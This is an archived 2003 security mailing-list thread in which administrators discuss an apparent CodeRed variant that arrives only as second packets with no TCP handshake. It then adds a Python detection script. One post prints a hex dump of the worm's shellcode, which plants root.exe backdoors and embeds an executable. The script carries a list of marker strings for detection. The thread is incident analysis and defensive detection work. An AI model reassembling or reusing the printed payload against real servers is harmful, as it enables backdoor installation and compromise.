Security Incidents mailing list archives

RE: New CodeRed strain? -- UPDATE


From: "larosa, vjay" <larosa_vjay () emc com>
Date: Tue, 29 Apr 2003 22:38:03 -0400

AHA! I reported this about a month ago and everyone thought I was crazy! I
have all sorts of packet captures of this kind of activity. There are
cmd.exe attempts, root.exe attempts, and the classic default.ida?X and
default.ida?N attempts, but no TCP three-way handshake. It is very strange.
These attempts are destined to IP addresses that are not even up and
running, never mind that they are all firewalled off from the outside. We should
compare notes. If you want to, you can contact me off the list.

vjl

-----Original Message-----
From: Frank Knobbe [mailto:fknobbe () knobbeits com] 
Sent: Monday, April 28, 2003 1:13 PM
To: incidents () securityfocus com
Subject: Re: New CodeRed strain? -- UPDATE

As I see it did make it to the list, here is an update.

The reason this packet hasn't been tripping the usual signatures is
simple. We are receiving *only* the second packet. There is no first
packet with GET /default.ida?XXXX etc.

The packet itself appears to be classic CodeRed (II I believe), but
again, we're getting only the second packet. No TCP 3-way, for first
packet.

While keeping our eyes on this, the majority appears to be coming from
China, but we do see some domestic (USA), Turkey, and I believe a Brazilian.

I'm curious if anyone else is seeing these second-packet-only CodeReds.

Regards,
Frank



On Fri, 2003-04-25 at 13:55, Frank Knobbe wrote:
Greetings,

We've been picking up some oddities since yesterday which look like a
new CodeRed variant. Traditional signatures didn't identify it as such,
but looking at the payload, it appears to be a CodeRed'ish type of bug.
We're starting a trap for a complete session now. (So far we have only
isolated packets.)

That isolated packet is below. I'll post the complete session once we
catch the whole thing. 

Has anyone else seen this?

Regards,
Frank

---8<---

04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0xD7D856CE  Ack: 0xF3E3078  Win: 0x4470  TcpLen: 20
00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43  ..u..U..E......C
6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55  loseHandle..u..U
F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74  ..E......_lcreat
00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F  ..u..U..E......_
6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8  lwrite..u..U..E.
E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC  ....._lclose..u.
FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79  .U..E......GetSy
73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89  stemTime..u..U..
45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C  E......WS2_32.DL
4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63  L..U..E......soc
6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00  ket..u..U..E....
00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75  ..closesocket..u
BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74  ..U..E......ioct
6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45  lsocket..u..U..E
A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75  ......connect..u
BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65  ..U..E......sele
63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00  ct..u..U..E.....
00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8  .send..u..U..E..
05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89  ....recv..u..U..
45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61  E......gethostna
6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00  me..u..U..E.....
00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF  .gethostbyname..
75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41  u..U..E......WSA
47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC  GetLastError..u.
FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33  .U..E......USER3
32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00  2.DLL..U..E.....
00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF  .ExitWindowsEx..
75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84  u..U..E...E.i...
08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1  ..@.E....xV4....
C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3  ........<.t.<.t.
C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1  ................
E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8  ................
E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF  ......... ......
FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF  ................
FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04  .............Y..
81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F  .#...#.X........
74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3  t....t.;.X...t..
68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D  h......\...P.U..
BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E  ..\........\CMD.
45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00  EXE.^.....cj....
00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72  ..d:\inetpub\scr
69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C  ipts\root.exe...
24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8  $....\...P.U.j..
2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C  +...d:\progra~1\
63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C  common~1\system\
4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B  MSADC\root.exe..
0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA  .$....\...P.U...
05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC  ............@...
00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0  ....*%).........
00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00  ................
00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00  ............ ...
00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00  .@..............
00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00  ............@...
04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00  ................
20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10   ...............
00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C  ............0...
01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10  ................
00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00  .......... ..`..
00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04  ........... ....
00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10  ..@.............
00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00  ...0............
00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC  ..........@.....
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68  ..........h....h
D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE  . @..a...... @..
00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8  . @.....j.h. @..
4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31  L........h.'...1
01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A  .....h.$@.h?...j
00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00  .h. @.h.....2...
0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68  ..u&j.hT @.j.j.h
48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF  H @..5.$@.......
35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68  5.$@......h.$@.h
3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80  ?...j.hX @.h....
E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C  .......uU.. @..L
00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68  ..... @..B...j.h
B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8  . @.j.j.h. @..5.
24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A  $@......j.h. @.j
01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99  .j.h. @..5.$@...
00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7  ....5.$@........
05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0  ..$@.....h.$@.h.
20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40   @.h.$@.j.U.5.$@
00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B  ..`.....uI..$@..
C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81  .t@.. @..>.t6Ff.
7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20  ~.,,u...217.... 
40 00 89 35                                      @..5
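The point Frank makes above is that a signature keyed on the first packet (the GET /default.ida request) never fires when only the second, payload-bearing ACK packet arrives. The script below is an added example, not code from the thread or from any of the posters: it rebuilds raw bytes from Snort-style hex/ASCII dump lines in the format shown above, looks for marker strings that are visible in that payload (\CMD.EXE, d:\inetpub\scripts\root.exe), and tracks per-flow SYN state so that a content hit can be reported together with whether a handshake was ever seen for that flow. The dump lines and packet records are constructed sample input (a few lines copied from the capture, with the source and destination as printed there); the Snort flag-string layout "12UAPRSF" with '*' for unset bits is an assumption about how the flag column in the capture header is laid out.

```python
import re
from dataclasses import dataclass

# Constructed sample input: a handful of hex/ASCII dump lines in the layout of
# the capture above. Only these lines are reproduced, so the reassembled payload
# is a fragment, not the whole packet.
SAMPLE_DUMP_LINES = [
    "68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D  h......\\...P.U..",
    "BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E  ..\\........\\CMD.",
    "45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00  EXE.^.....cj....",
    "00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72  ..d:\\inetpub\\scr",
    "69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C  ipts\\root.exe...",
    "40 00 89 35                                      @..5",
]

# Marker strings taken from the ASCII column of the capture. Chosen here for
# illustration; not a vendor signature.
CODERED_MARKERS = [b"\\CMD.EXE", b"d:\\inetpub\\scripts\\root.exe", b"root.exe"]

# Hex bytes are separated by single spaces; the ASCII column follows two spaces,
# so the greedy match stops at the end of the hex area.
HEX_PREFIX = re.compile(r"^((?:[0-9A-Fa-f]{2} )+)")


def parse_hexdump(lines):
    """Rebuild raw payload bytes from Snort-style 'hex  ascii' dump lines."""
    out = bytearray()
    for line in lines:
        m = HEX_PREFIX.match(line)
        if not m:
            continue
        out.extend(bytes.fromhex(m.group(1).replace(" ", "")))
    return bytes(out)


def find_markers(payload):
    """Return the marker strings present in a payload, as text."""
    return [m.decode("ascii") for m in CODERED_MARKERS if m in payload]


def snort_flags(flag_str):
    """Assumed Snort flag column layout: '12UAPRSF', '*' for an unset bit."""
    return {name for name, ch in zip("12UAPRSF", flag_str) if ch != "*"}


@dataclass
class Packet:
    src: str
    dst: str
    flags: str          # e.g. "***A****" (ACK only) or "******S*" (SYN)
    payload: bytes = b""


def scan(packets):
    """Content match on every packet, plus per-flow SYN tracking so that a hit
    on a flow with no handshake is reported as such."""
    syn_seen = set()
    alerts = []
    for p in packets:
        key = (p.src, p.dst)
        if "S" in snort_flags(p.flags):
            syn_seen.add(key)
        hits = find_markers(p.payload)
        if hits:
            alerts.append({
                "src": p.src,
                "dst": p.dst,
                "markers": hits,
                "handshake_seen": key in syn_seen,
            })
    return alerts


if __name__ == "__main__":
    payload = parse_hexdump(SAMPLE_DUMP_LINES)
    # The case from the thread: a lone ACK packet, no SYN ever observed.
    for alert in scan([Packet("200.204.148.110", "x.x.x.x", "***A****", payload)]):
        print(alert)
```

A rule that matches only on the request line misses this traffic entirely; matching on the payload strings catches it, and the handshake flag separates a real exploit session from the bare second packets described in the thread.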
